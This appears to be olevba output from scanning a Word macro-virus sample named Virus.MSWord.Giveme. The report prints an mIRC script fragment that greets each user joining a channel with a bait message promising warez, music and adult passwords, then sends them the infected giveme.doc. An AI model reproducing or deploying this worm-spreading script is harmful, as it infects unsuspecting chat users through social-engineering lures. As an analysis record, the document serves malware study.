olevba 0.60.1.dev3 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: Virus.MSWord.Giveme-ffa04a45e36f9f54e3f9e85cebcfb5429f6e5a29
Type: Text
-------------------------------------------------------------------------------
VBA MACRO Virus.MSWord.Giveme-ffa04a45e36f9f54e3f9e85cebcfb5429f6e5a29 
in file: Virus.MSWord.Giveme-ffa04a45e36f9f54e3f9e85cebcfb5429f6e5a29 - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[script]
n0=on 1:JOIN:#:{
n1=/msg $nick Hi $nick! Please read the file I'm sending to you. You will get warez, mp3 and XXX passwords FOR FREE!
n2=/send $nick c:\mirc\giveme.doc
n3=}

No suspicious keyword or IOC found.

